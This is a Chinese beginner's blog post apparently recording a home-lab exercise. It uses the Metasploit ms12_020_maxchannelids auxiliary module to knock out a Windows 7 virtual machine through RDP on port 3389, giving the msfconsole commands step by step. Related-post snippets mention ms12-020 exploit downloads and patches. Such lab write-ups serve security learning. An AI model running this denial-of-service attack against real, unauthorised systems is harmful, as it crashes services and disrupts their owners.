Metasploit Framework学习————ms12_020漏洞（）

最新推荐文章于 2025-06-09 13:57:42 发布

原创最新推荐文章于 2025-06-09 13:57:42 发布 · 767 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#求助

学习过程专栏收录该内容

1 篇文章

订阅专栏

             本人刚接触到安全领域 写此帖来记录自己的成长过程 我会记录每一次学习中的实践操作

希望能得到安全圈中的大佬们的指点

攻击机：192.168.1.103 kali linux 系统
受害机：192.168.1.106 windows7系统

1.首先在自己的虚拟机中打开kali和windows系统

2.在Windows系统cmd命令行输入以下代码来查看本机端口开启情况

netstat -an

查看自己是否开启3389端口

3.端口正常开启后打开kali终端启动msf控制台

msfconsole

开启后

msf > serch ms12_020

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids

show options

此时会出现要发动这次攻击时必须要进行的设置

set RHOSTS  后跟目标主机的ip

show options (查看设置是否成功)

run

msf auxiliary(ms12_020_maxchannelids) > run

如果目标存在此漏洞即可攻击成功

2018.9.26

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

_wlw

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

metasploit-framework教程（基础篇）

hackerisking的博客

02-24

674

此时将会生成位于home文件夹且名为test.exe的可执行文件（病毒），与metasploit上的multi/handler模块配合，操控靶机电脑。在所有的参数中，最重要的有四个：LHOST和LPORT（监听IP和端口），RHOST和RPORT（靶机IP和端口）这四个参数要设置哪两个，依选择的模块而定。这样，对模块的设置就大功告成了，然后就用exploit/run运行模块。metasploit还有一个好用的拓展功能——msfvenom。在use [模块]后，使用options查看参数。

Metasploitable渗透测试实战：ms12-020

m0_60121089的博客

05-06

699

1.漏洞描述 ms12-020漏洞的定义是指操作系统的远程桌面协议存在重大漏洞，入侵者（黑客）可以通过向远程桌面默认端口（3389）发一系列特定RDP包，从而获取超级管理员权限，进而入侵系统。（ms12-020漏洞可用于漏洞攻击）根据实际被入侵终端进行分析，开放远程桌面服务并使用默认的3389端口的会成为攻击目标。 2.实战工具软件：VMware Workstation 14 攻击机：kali（ip：192.168.240.143）靶机：win7（ip：192.168.240.159）

参与评论您还未登录，请先登录后发表或查看评论

ms12-020漏洞复现

热门推荐

成长

01-23

2万+

metasploit详细介绍，主要介绍了msfconsole和msfvenom工具的使用，同时进行了payload实验，拿取对方shell。

Windows系统漏洞MS12-020

Nanyeer的博客

05-16

1810

使用kali和win2003演示Windows系统漏洞MS12-020

Kali linux 学习笔记（九十五）metasploit framework——弱点扫描 2020.4.27

闵行小鱼塘

04-27

932

本节学习用msf弱点扫描

Kali linux 学习笔记（九十六）metasploit framework——客户端渗透 2020.4.28

闵行小鱼塘

04-28

943

本节学习客户端渗透

Kali linux 学习笔记（九十一）metasploit framework——exploit模块 2020.4.24

闵行小鱼塘

04-27

718

本节学习exploit模块

Kali linux 学习笔记（九十七）metasploit framework——后渗透阶段（一） 2020.4.29

闵行小鱼塘

04-29

905

在获取shell后，需要扩大战果，提权，信息收集，渗透内网，永久后门

Metasploit漏洞利用系列（三）：MSF渗透测试实战——网络服务器攻击渗透

2402_86373248的博客

08-16

683

本文将围绕一个典型场景——利用MS17-010漏洞对Windows服务器进行渗透测试，以展示Metasploit的强大功能和渗透测试的实际操作步骤。通过本次实战，我们不仅展示了Metasploit在渗透测试中的强大能力，同时也提醒所有系统管理员及时更新系统和打补丁的重要性。记住，合法的渗透测试应当在授权和法律允许的范围内进行，旨在帮助提升网络安全，而非非法入侵。后续行动建议：在完成渗透测试后，撰写详细的报告，总结发现的安全漏洞，并提出相应的修补建议，帮助客户加强网络安全防护体系。命令检查目标是否易受攻击。

ms12-020 for exe版本

03-17

MS12-020 PoC RDP MS , ms12-020 for exe版本 ms12-020,下载,exp,0day ms12-020.exe 3389远程溢出0DAY

ms12-020压缩包

04-03

　　本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏 3月19日消息，Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020，微软公司把该漏洞级别定为最高级-严重(Critical)，攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限

ms12-020 Windows6.1-KB2621440-x64-KB2667402-v2-x64.rar

12-10

Windows6.1-KB2621440-x64.msu Windows6.1-KB2667402-v2-x64.msu

ms12-020 xp补丁

12-20

ms12-020 xp补丁 WindowsXP-KB2621440-x86

windows漏洞ms12-020

HKJ_BD的博客

07-07

412

ms12-020漏洞攻击工具基于windowsxp,win7,windows_server_2003等版本进行攻击，使用如下一：下载ms12-020.poc.final.exe 二：命令模式下进入攻击工具所在目录，运行该工具三：输入受攻击主机ip进行攻击四：攻击成功 ...

Windows 7 和 Windows Server 2008 R2 重要安全更新 - MS12-020

weixin_30789053的博客

10-28

1857

本文还有配套的精品资源，点击获取简介：该补丁包“Windows6.1-KB2621440-x64.zip”是针对64位Windows 7和Windows Server 2008 R2系统的更新，用于解决安全漏洞MS12-020（CVE-2012-0002）。补丁包含在KB编号2621440中，安装流程包括下载、解压、执行msu文件并重启计算机。该更新修复了一个严重的安全问...

利用MS12-020实现拒绝服务攻击

wrypot的博客

04-01

701

然后再run一下，The target is vulnerable，检测出目标主机是有这个漏洞的。设置目标地址后再show options看一下，成功将地址添加到载荷里面了。注意一下，添加的这个地址需要是win2003存在的，不存在的地址是没用的。，将地址添加到攻击载荷里面，最后run，这里有两个载荷，使用check载荷。发现可以添加RHOSTS目标地址。现在将check载荷换成攻击载荷。看这个载荷里面可以添加哪些参数。RPORT端口是3389端口。然后用set去设置目标地址。目标主机被打崩，出现蓝屏。

ms 12-020（死亡蓝屏）

2301_81401822的博客

11-18

524

Microsoft windows远程桌面协议RDP远程代码执行漏洞该漏洞针对于3389的远程桌面服务，并不是操作系统ms 12-020(死亡蓝屏)这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包，则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下，任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。

BT5利用ms12_004_midi漏洞的Win7渗透教程：Metasploit实战

本篇教程详细介绍了如何在BT5渗透测试环境下，利用Metasploit框架中的ms12_004_midi漏洞进行攻击。首先，我们设定了一个实验环境，包括在Windows 7系统上通过VMware搭建的虚拟机，其中BT5作为攻击者机器，IP地址为...